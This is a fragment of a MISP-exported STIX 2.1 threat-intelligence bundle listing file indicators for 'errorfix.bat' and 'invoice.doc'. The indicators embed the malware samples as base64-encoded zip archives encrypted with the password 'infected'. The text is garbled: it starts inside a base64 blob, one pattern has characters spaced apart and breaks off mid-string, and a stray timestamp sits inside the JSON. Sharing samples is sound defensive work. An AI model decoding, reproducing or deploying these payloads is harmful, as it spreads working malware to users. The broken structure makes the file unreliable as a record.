y8C4mJn3mHQFooTUGIqMBgFEqoMSd9/zRyAeAvorOXqUPdKLLEQ8qJtYgZ22WuMnoDVoADwxwf9mIOnhDKFgFtNIjrm2iZLY++BqEebImNpybXs3lM0mQQvmf1R6QjfmnBxntEDcEz6n4MyxIkbTO2nMMKFZeGTdsYtonc6qloTt2xiwsWLT2COyJ8Lk+1glsUJLLYSwSu4SMmaXreJz6RKq04v3Ut7xZqXwbH7NYfvvnTQNdN38DJqLUjdgwsL03xDnUW6URiV60Zhb9s5S58KPOVos3zkstdNVYu/euAxu4cs5jf4bj7Yk004kFetRPeMRWfl8IQKT1xNeRiIeyDVu+lzn+PQrKhsid9e8DwOYZV8FITtz/+CUJEJWmy/9al+U+cjaCUjBd+VzQRtAL2wz+79+2I9+34qSjmTRt4O7Iibxwr772vb77esf6jzwxAEDn4qCnaJFNVKUp9fKj0Wx7Osj/2kDH5x6GPku8Ta1wpfl4P2yfpNMpnydaNEOouMV6dqZZ3696lHN9lQzjQVbzFGJcds8ZghFtYfyidKrCJoeHWE1xdGeK6QFr5YaYJ4xBrHecQZCSKSuD1rV3y75erjC7HadZJBbClRfpVe1suv5FfyYB3Zi35w2+uoz3e6qAvmOYzbNRP6q9aWqrtQccIpwbu1+Mgvd3pFbWlN2IlsB129QhXInYoGnRPqAIuol2EsRARGlLmzT7AH0/r6a6AiURdUP3DmEIRiiAVikZkU4nw5LdyReE2rrUjvF9vto+sXmbKxC+LP7vHTwruWbdszE+rXjgXi+G8q4bogcBdEYqzDwG+/Y1Ee6tifjSUHTaCZvHXMySuSFPnUrGXbw/9VYwdUHHzoHqldMSZvQdfA0PtDjwoSMXaDHn07MaQ7ljPpkgJWyLWa6MNEnB0/4ORNflCA0KzWrHmIR
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-03-10T14:25:20Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5e67a35f-bc6c-4a73-901f-4d400a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T14:25:35.000Z" ,
"modified" : "2020-03-10T14:25:35.000Z" ,
"pattern" : "[file:hashes.MD5 = '4368db27ef2f07171c2c13d2e537d459' AND file:hashes.SHA1 = '7993ebdea9421a85b431077b2d89ee3344180759' AND file:hashes.SHA256 = '17b8571df60a9953f7e50edcd623eca414ce9bae64362ba3ab0069778cf40a1a' AND file:name = 'errorfix.bat' AND file:size = '2864' AND (file:content_ref.payload_bin = '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' AND file:content_ref.x_misp_filename = 'errorfix.bat' AND file:content_ref.hashes.MD5 = '4368db27ef2f07171c2c13d2e537d459' AND file:content_ref.mime_type = 'application/zip' AND file:content_ref.encryption_algorithm = 'mime-type-indicated' AND file:content_ref.decryption_key = 'infected')]" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-03-10T14:25:35Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5e67a3aa-e8c0-4340-8080-475b0a0a020f" ,
"created_by_ref" : "identity--5e157d76-c92c-4acd-a54e-4a01950d210f" ,
"created" : "2020-03-10T14:26:50.000Z" ,
"modified" : "2020-03-10T14:26:50.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' d 627615 f 955 d d 5342 e f 6 b 4 c 6938 a d 98 c ' A N D f i l e : h a s h e s . S H A 1 = ' 645467 b 3207 a 50 c 43 b e 0 75 a 0 b 81308 a 5 f 6935 c 59 ' A N D f i l e : h a s h e s . S H A 256 = ' 1 a 508909 a 8 e f 0 20 a b 5285 c e 47106 b e a c 317 c 2 a e 0 d 2971 e f f 9 a 4 f 95 a 5079 e e e 7 f ' A N D f i l e : n a m e = ' i n v o i c e . d o c ' A N D f i l e : s i z e = ' 441560 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A F l z a l C T 1 q s A I o E G A N i 8 B g A g A B w A Z D Y y N z Y x N W Y 5 N T V k Z D U z N D J l Z j Z i N G M 2 O T M 4 Y W Q 5 O G N V V A k A A 6 q j Z 16 q o 2 d e d X g L A A E E I Q A A A A Q h A A A A Z p q + + X 3 m / H u T B Y L Q Y j 5 n O g P E O J O 98 L 9 y 9 b o u + 7 I g L 12 j M o e R + p E h 9 V O r 8 j t k y A M j E R J 3 l k M Q L 86 M 5 U K L R 2 a 0 v N L r i q r z U x e 8 S r s N r V q Y M V m I S d 9 R P v Z j W e R b T A w I a x K 8 E w e 0 r X Z z I U N v H w 9 T 8 b M n 5 c w T P 9 b h s 84 u 2 M J e U M S V T S w H z I I n N B W 3 G 1 A w W h L e Y i C 1 I 71 V T Q y r I 97 X M V Q t d K W v a q O H N k a E + S K 5 w a 5 z y q Y A s g R j m F 5 G u 61 Y b U 7 l t D Z u q g O m I y R L 15 k A G E V Z Y Q F I k 9 P l e r k Z w I 0 8 v x 5 G U 1 I u 9 w R n 7 p G H N m W O g 8 B s 2 t 3 b 4 V 2 m j L U 2 I T k L w t o n M Z 0 0 u y Z 7 I 38 O A 3e3 R E K 2 X M t m b 5 g u 0 X k w 2 J g V g g D 1 n n u d i + h / O o s s E G V z W a o 87 o t n 95 L f x u 5E3 c O s 5 b I V G 6 U v O A l g c f Y K L F + N c Y 4 T 1 U 7 k T t W q R F j U 5 p + p T C F Q 5 N W / o C + M J N G G 3 S Z Y a B x 9 N i 4 m D j F P S c W 0 V l s 1 y 0 l 71 Q 7 T 4 / c b Q n U M i H 6 + m 4 s C x k V G d T T r Y p g 6 n 4 A p m 2 Q C k 0 W S s n S X S B q 9 U y 1 p m D m a e + t y l Q m Z 6 M P b o N f 1 N y v h f s L 2 / N i I a 0 7 E o S v I 7 J q v A + R H L A c v M r 0 M + 77 d r v f h N o A + u 8 N k V x t i 6 C 1 o L H s l 97 Y K y I q e Y j / b A 1 i Q d F a L / W r y D 8 Z c / E i K f t b v l U d A g i q b l f S b J 4 W / k c A V g V F B 9 w O I b T u 5 S 6 t N + 51 g S G y g o Q 9 J A l e u m 7 T U M T V c 8 t h m H B + a E 9 O p M c J I Z q Q Q V 5 W Z X J c X M a X a p l 9 + 7 b n m f s f 1 A s V 5 Y j s M o 3 U F 9 P e 7 O 1 M O 9 B v F e 9 a C f X B P f r o u G d N 0 7 M F J T p d Z r z L N b v r A 26 m / j q G 9 C 8 A g o K r r B V q L / + 2 p M F S D S Q f 3 h J J C 6 Z r d V B 8 a 2 U f H 7 i g E z T o 6 s k 0 B Y P U a Y 1 u A W z 63 K V a z b j l b a E h j L t 86 c x R o T 0 B 70 u 4 t 5 S U A f O P X P s X w T F 9 G s 7 j Z 74 r b A G C h B J 8 t R h c m H S j Z O j b 7 m E 6 d 9 Q m z H V Y T U u N D w s A n b 8 H O y T 88 M A c O r m / m W l y b C v M k V s Q 7 k R 0 l 7 W c X i v W b E z 6 y l K t 8 A l C N q 1 Z G M 8 b K m d 6 Y l n t T d l + q E N f l i h w z D K k X Z y p i S R x h x j S 1 m T K 0 Q q 3 x b F g q l / g y f m s E p n d N W z C 89 C 6 j v n 9 F 2 B 3 l S E e u 0 f 3 N I w S g s L H q 5 T W + W S g Y c q q t Y c J 0 X t r s S P a z z 0 Y 9 a L 12 Z 71 X L o 5 m k u n R + Z I K 2 z u W Z k z W 94 T R t I 9 p e i F h I j J o 2 C V C I F Y m L l x Q J l a s 2 / k K o y C u q j F x 1 P 6 x S m i g L k Z X P 8 V 5 d Y 8 z / e S S r B X E T C E z D V 9 l z 8 n x f w i 6 j K U c i J / K 4 n c C M 6 e E s J e E L w o H J L N U h H x T K c B U q 7 k 9 G Y J R P q I l + L w c o H 4 P e G q q j C 5 B M p j W q w q D 859 + Q + d D 6 M r T K m i r t W J 6 o c n E B V y t M v 0 z C 0 v d 6 r N q C l K 9 s q V I G D l g 85 v A u D b a W 2 D 0 f x z J m Y 655 H 5 z R p o e P 4 s A F v C 6 U 6 w A h v f A E v a D J s D 4 F E j B h k k N H + B 4 R z D G U H 752 N i X J Q P j w y Y w e 4 U S g z p x t z c J n 15525 b u n C 7 v 1 G R l x C a g e k u l Q T 5 R j Q T A e w 49 Z 1 W T j d f / S M i z Z p R l m I E t B y b w 1 p F 1 X i e y E L 7 m / 9 H P S Y L o / y Q i a + p a J b B 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
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-03-10T14:26:50Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "marking-definition" ,
"spec_version" : "2.1" ,
"id" : "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ,
"created" : "2017-01-20T00:00:00.000Z" ,
"definition_type" : "tlp" ,
"name" : "TLP:WHITE" ,
"definition" : {
"tlp" : "white"
}
}
2023-04-21 13:25:09 +00:00
]
}
